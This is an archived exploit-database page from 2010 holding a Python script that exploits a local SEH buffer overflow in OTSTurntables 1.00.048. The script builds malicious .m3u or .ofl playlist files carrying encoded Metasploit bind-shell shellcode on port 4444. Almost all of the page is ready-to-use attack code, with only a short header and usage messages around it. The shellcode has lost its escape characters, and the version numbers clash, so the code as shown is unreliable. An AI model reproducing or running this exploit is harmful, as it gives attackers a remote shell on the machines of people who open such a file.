[local exploits] - OTSTurntables 1.00.048 (m3u/ofl) Local BO
Posted on 28 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH) by 0v3r in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================================== OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH) ======================================================== # Exploit Title: OTSTurntables 1.00.028 (m3u/ofl) Local BOF Exploit (SEH) # Date: 11/24/2010 # Author: 0v3r # Software Link: http://www.otsturntables.com/download-otsturntables-free/ # Version: 1.00.048 # Tested on: Windows XP SP3 EN # CVE: N/A #!/usr/bin/python import sys # win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com shellcode = ("xebx03x59xebx05xe8xf8xffxffxffx49x48x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax4a" "x58x50x30x42x30x42x6bx42x41x5ax32x42x42x42x32x41" "x42x41x30x41x41x58x50x38x42x42x75x4bx59x4bx4cx30" "x6ax58x6bx52x6dx6dx38x38x79x39x6fx4bx4fx39x6fx75" "x30x6ex6bx32x4cx71x34x34x64x6ex6bx31x55x37x4cx6e" "x6bx33x4cx55x55x53x48x57x71x68x6fx6cx4bx50x4fx47" "x68x6ex6bx53x6fx47x50x56x61x7ax4bx72x69x6ex6bx36" "x54x4ex6bx63x31x38x6ex37x41x6bx70x4fx69x6cx6cx4b" "x34x4bx70x52x54x64x47x6fx31x4bx7ax34x4dx46x61x59" "x52x48x6bx5ax54x65x6bx73x64x41x34x77x58x74x35x6b" "x55x4ex6bx61x4fx57x54x75x51x58x6bx70x66x6cx4bx36" "x6cx42x6bx6ex6bx31x4fx67x6cx46x61x7ax4bx63x33x66" "x4cx6cx4bx6cx49x50x6cx66x44x47x6cx53x51x6fx33x64" "x71x4bx6bx41x74x4ex6bx63x73x56x50x6cx4bx63x70x76" "x6cx6cx4bx52x50x67x6cx6cx6dx4cx4bx57x30x43x38x33" "x6ex53x58x4cx4ex30x4ex76x6ex7ax4cx32x70x4bx4fx78" "x56x62x46x66x33x61x76x75x38x66x53x36x52x75x38x71" "x67x32x53x45x62x63x6fx56x34x6bx4fx6ex30x70x68x58" "x4bx48x6dx4bx4cx35x6bx46x30x6bx4fx38x56x53x6fx4f" "x79x6bx55x50x66x6ex61x48x6dx76x68x37x72x73x65x41" "x7ax45x52x79x6fx38x50x30x68x4bx69x34x49x49x65x6e" "x4dx66x37x6bx4fx7ax76x50x53x46x33x36x33x42x73x46" "x33x57x33x50x53x41x53x32x73x6bx4fx4ex30x75x36x31" "x78x77x61x73x6cx52x46x43x63x6dx59x58x61x4cx55x52" "x48x4fx54x54x5ax50x70x4fx37x61x47x4bx4fx4ex36x30" "x6ax76x70x73x61x71x45x39x6fx6ex30x30x68x69x34x6c" "x6dx76x4ex49x79x66x37x79x6fx6bx66x63x63x42x75x59" "x6fx7ax70x41x78x4dx35x57x39x6cx46x57x39x42x77x59" "x6fx68x56x52x70x31x44x51x44x46x35x4bx4fx78x50x4e" "x73x50x68x58x67x44x39x48x46x30x79x41x47x6bx4fx59" "x46x51x45x6bx4fx6ex30x75x36x50x6ax70x64x32x46x62" "x48x52x43x50x6dx6dx59x4dx35x63x5ax52x70x32x79x65" "x79x38x4cx4fx79x69x77x30x6ax62x64x4bx39x6bx52x30" "x31x4fx30x6ax53x6cx6ax39x6ex43x72x74x6dx59x6ex71" "x52x74x6cx6fx63x4cx4dx50x7ax50x38x6cx6bx4ex4bx6c" "x6bx33x58x33x42x59x6ex6fx43x45x46x39x6fx53x45x50" "x44x79x6fx79x46x63x6bx50x57x71x42x71x41x70x51x50" "x51x33x5ax74x41x42x71x32x71x76x35x30x51x69x6fx7a" "x70x72x48x4ex4dx6ax79x53x35x6ax6ex30x53x79x6fx5a" "x76x30x6ax6bx4fx39x6fx65x67x6bx4fx5ax70x6ex6bx72" "x77x59x6cx6bx33x7ax64x70x64x49x6fx7ax76x76x32x6b" "x4fx5ax70x30x68x6cx30x6fx7ax57x74x73x6fx73x63x6b" "x4fx38x56x4bx4fx4ex30x4a") # near jump 928 bytes encoded with Alpha2 encoder jump = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x37x49x49x49x51x5ax6ax65" "x58x50x30x41x31x41x42x6bx41x41x75x41x32x41x41x32" "x42x41x30x42x41x58x38x41x42x50x75x38x69x49x79x55" "x30x79x6cx4bx4fx4bx4fx65") nopsled = "x90" * 16 junk = "x90" * (912 - len(shellcode)) nseh = "xebx06x90x90" # short jump seh = "x3fx28xd1x72" # 0x72D1283F - ppr - msacm32.drv jump = "xe9x60xfcxffxff" # near jump stuff = "x44" * 10000 buff = junk + shellcode + nseh + seh + nopsled + jump + stuff try: print " " print "---------------------------------------------------------------------------------" print "| OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH) |" print "---------------------------------------------------------------------------------" print " " if len(sys.argv)!=2: print "Usage: exploit.py <option> " print "File type options:" print "[1] m3u file" print "[2] ofl file" sys.exit(0) if int(sys.argv[1]) == 1: fname = "exploit.m3u" elif int(sys.argv[1]) == 2 : fname = "exploit.ofl" else: print "Check again the available options!" sys.exit(0) f = open(fname,'w') f.write(buff) f.close() print "- File ",fname," created..." print "- To run exploit open OTSTurntables 1.00.028 and import the file",fname except SystemExit: pass except ValueError: print "Check again the available options!" except: print "-Oooops! Can't write file... " # <a href='http://1337db.com/'>1337db.com</a> [2010-11-28]</pre></body></html>
